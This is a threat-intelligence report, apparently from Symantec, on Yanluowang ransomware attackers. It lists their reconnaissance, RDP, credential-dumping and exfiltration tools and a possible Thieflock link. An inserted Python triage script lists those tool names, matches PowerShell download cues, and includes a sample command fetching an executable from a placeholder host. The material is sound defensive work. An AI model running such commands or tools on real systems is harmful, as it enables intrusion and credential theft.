Yanluowang: Further Insights on New Ransomware Threat

By Symantec Threat Hunter Team

December 1, 2021

At least one attacker now using Yanluowang may have previously been linked to Thieflock ransomware operation.

Yanluowang, the ransomware recently discovered by Symantec, a division of Broadcom Software, is now being used by a threat actor that has been mounting targeted attacks against U.S. corporations since at least August 2021. The attacker uses a number of tools, tactics, and procedures (TTPs) that were previously linked to Thieflock ransomware attacks, suggesting that they may have been a Thieflock affiliate who shifted allegiances to the new Yanluowang ransomware family.

The attackers have been heavily focused on organizations in the financial sector but have also targeted companies in the manufacturing, IT services, consultancy, and engineering sectors.

Lateral movement

In most cases, PowerShell is used to download tools, including BazarLoader, to compromised systems to assist in reconnaissance. The attackers then enable RDP through a registry change to allow remote access. After gaining initial access, the attackers usually deploy ConnectWise (formerly known as ScreenConnect), a legitimate remote access tool.

In order to perform lateral movement and identify systems of interest, such as the victim's Active Directory server, the attackers deploy Adfind, a free tool that can be used to query Active Directory, and SoftPerfect Network Scanner (netscan.exe), a publicly available tool used for discovery of hostnames and network services.

The next phase of the attack is credential theft and the attackers use a wide range of credential-stealing tools, including:

  • GrabFF: A tool that can dump passwords from Firefox
  • GrabChrome: A tool that can dump passwords from Chrome
  • BrowserPassView: A tool that can dump passwords from Internet Explorer and a number of other browsers

Along with these tools, the attackers also use a number of open-source tools such as KeeThief, a PowerShell script to copy the master key from KeePass. In some cases, customized versions of open-source credential-dumping tools were also observed (secretsdump.exe). Credentials were also dumped from the registry.

The attackers have also used a number of other data capture tools, including a screen capture tool and a file exfiltration tool (filegrab.exe). Cobalt Strike Beacon was also deployed against at least one targeted organization.

Other tools used include ProxifierPE, which can be used to proxy connections back to attacker-controlled infrastructure, and the free, Chromium-based Cent web browser.
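As an added illustration of how a defender might turn the tool names and the RDP registry change described in this section into simple triage logic (example code written for this page, not Symantec's tooling), assuming Sysmon-style process-creation and registry events already normalised into dicts. The `fDenyTSConnections` value name and the `adfind.exe` file name are assumptions, since the article names neither.

```python
"""Toy triage of process-creation and registry-set events for the TTPs
described above (constructed sample data; not Symantec tooling)."""
import re
from pathlib import PureWindowsPath

# Tool file names given in the article. "adfind.exe" is the usual binary name
# for AdFind (assumed; the article only says "Adfind").
SUSPECT_IMAGES = {"netscan.exe", "filegrab.exe", "secretsdump.exe", "adfind.exe"}

# PowerShell download primitives commonly used to fetch tooling.
DOWNLOAD_CUES = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer",
    re.IGNORECASE,
)

# Registry value that enables RDP when set to 0 (assumed to be the value the
# attackers change; the article only says "enable RDP via registry").
RDP_KEY = r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"
RDP_VALUE = "fDenyTSConnections"


def triage(events):
    """Return (tag, detail) findings for events matching the article's TTPs."""
    findings = []
    for ev in events:
        if ev["type"] == "process":
            image = PureWindowsPath(ev["image"]).name.lower()
            if image in SUSPECT_IMAGES:
                findings.append(("tool", image))
            elif image == "powershell.exe" and DOWNLOAD_CUES.search(ev.get("cmdline", "")):
                findings.append(("ps_download", ev["cmdline"]))
        elif ev["type"] == "registry":
            same_key = ev["key"].lower() == RDP_KEY.lower()
            if same_key and ev["value"].lower() == RDP_VALUE.lower() and str(ev["data"]) == "0":
                findings.append(("rdp_enabled", ev["key"]))
    return findings


# Constructed sample events (not real telemetry); the URL is a placeholder.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/t.exe','C:\\Users\\Public\\t.exe')"},
    {"type": "registry", "key": RDP_KEY, "value": RDP_VALUE, "data": 0},
    {"type": "process", "image": r"C:\Users\Public\netscan.exe", "cmdline": "netscan.exe /hide"},
    {"type": "process", "image": r"C:\Users\Public\filegrab.exe", "cmdline": "filegrab.exe"},
    {"type": "process", "image": r"C:\Program Files\App\notepad.exe", "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for tag, detail in triage(SAMPLE_EVENTS):
        print(f"[{tag}] {detail}")
```

Image-name matching alone is a weak signal (the tools are trivially renamed), so in practice such hits should be paired with the registry and PowerShell indicators rather than used on their own.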

The Thieflock connection

There is a tentative link between these Yanluowang attacks and older attacks involving Thieflock, a ransomware-as-a-service offering developed by the Canthroid (aka Fivehands) group. Several TTPs used by these attackers overlap with those seen in Thieflock attacks, including:

  • Use of custom password recovery tools such as GrabFF and other open-source password dumping tools
  • Use of open-source network scanning tools (SoftPerfect Network Scanner)
  • Use of free browsers, such as s3browser and Cent browser

This link raises the question of whether Yanluowang was developed by Canthroid. However, analysis of Yanluowang and Thieflock does not provide any evidence of shared authorship. Instead, the most likely hypothesis is that these Yanluowang attacks may be carried out by a former Thieflock affiliate.
